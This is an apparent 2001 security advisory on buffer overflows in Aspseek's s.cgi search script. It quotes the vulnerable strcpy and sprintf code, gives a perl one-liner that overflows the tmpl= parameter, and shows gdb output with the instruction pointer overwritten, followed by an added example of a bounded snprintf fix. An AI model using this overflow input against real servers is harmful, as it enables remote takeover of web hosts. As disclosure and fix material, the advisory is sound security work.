Aspseek Search Engine buffer overflow

by phiber on March 20th, 2001

Once compiled and properly set up, you are left to copy s.cgi to the cgi-bin of your web server. This script acts as the input and output for the search engine: it takes user-defined data and returns the search results. Unfortunately there is a problem in the parsing of that user-defined data.


There are multiple buffer overflow conditions in s.cgi, the first being the
most obvious:

1.
sc.cpp:
int search(char *exe, char *arg) {
==>
if ((env = getenv("QUERY_STRING")))
{
strcpy(query_string, env);
....
}
<==
}

Where query_string is declared as query_string[STRSIZ], with STRSIZ = 4 x 1024.

Through experimentation I found that it takes at least 10272 chars to
overflow this buffer, which makes it useless remotely, since Apache by
default will only accept a URI of 8190 bytes.

2.
templates.cpp:
int CCgiQuery::ParseCgiQuery(char* query, char* templ) {
==>
else if (!STRNCMP(token, "tmpl="))
{
char* tmpl = token + 5;
char tmplu[2000];
sprintf(tmplu, "&tmpl=%s", tmpl);
....
}
<==
}

The above condition is a classic buffer overflow: the user-supplied tmpl value is
written into the fixed 2000-byte tmplu buffer with an unbounded sprintf. I found that
the buffer can be overflowed with 5148 bytes of data, which is well within Apache's
URI limit and therefore makes this remotely exploitable.

Example:

[[email protected] cgi-bin]# export QUERY_STRING="q=a&tmpl=`perl -e'printf("a"x5200)'`"
[[email protected] cgi-bin]# ./s.cgi

Content-type: text/html

Can't open template file 'aaaaa...............'!
Segmentation Fault (core dumped)

[[email protected] cgi-bin]# gdb s.cgi core

GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-asplinux-linux"...
Core was generated by `./s.cgi'.
Program terminated with signal 11, Segmentation fault.

#0 0x61616161 in ?? ()
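For comparison, here is the same "&tmpl=" construction from case 2 done with a bounded write and an explicit fit check, so an over-long value is rejected instead of overrunning the stack. This is an added example, not Aspseek's code; the 2000-byte buffer and the 5200-byte value are taken from the advisory, while TMPLU_SIZE, build_tmpl_param, max_tmpl_value_len and try_tmpl_value are names chosen for this illustration.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Added example (not Aspseek's code): a bounded replacement for the
 * tmpl= handling.  Sizes mirror the advisory's tmplu[2000]. */
#define TMPLU_SIZE   2000
#define TMPL_PREFIX  "&tmpl="

/* Build "&tmpl=<value>" into out.  snprintf() never writes past outsz;
 * its return value is the length it *wanted*, so n >= outsz means the
 * value did not fit and must be rejected rather than silently truncated
 * (a truncated template path would name a different file). */
bool build_tmpl_param(const char *value, char *out, size_t outsz)
{
    int n = snprintf(out, outsz, TMPL_PREFIX "%s", value);
    if (n < 0 || (size_t)n >= outsz) {
        if (outsz > 0)
            out[0] = '\0';          /* leave nothing half-written behind */
        return false;
    }
    return true;
}

/* Largest value length that still fits: buffer minus prefix minus NUL. */
size_t max_tmpl_value_len(void)
{
    return TMPLU_SIZE - strlen(TMPL_PREFIX) - 1;
}

/* Feed a value of 'a' x len (like the advisory's perl one-liner) through
 * the bounded builder; returns 1 if accepted, 0 if rejected. */
int try_tmpl_value(size_t len)
{
    char value[8192];               /* above Apache's default URI limit */
    char tmplu[TMPLU_SIZE];
    if (len >= sizeof value)
        return 0;
    memset(value, 'a', len);
    value[len] = '\0';
    return build_tmpl_param(value, tmplu, sizeof tmplu) ? 1 : 0;
}

int main(void)
{
    printf("max tmpl value length: %zu\n", max_tmpl_value_len());
    printf("5200-byte value: %s\n", try_tmpl_value(5200) ? "accepted" : "rejected");
    return 0;
}
```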

Posted by NeilK ([email protected]/[email protected]), www.alldas.de.
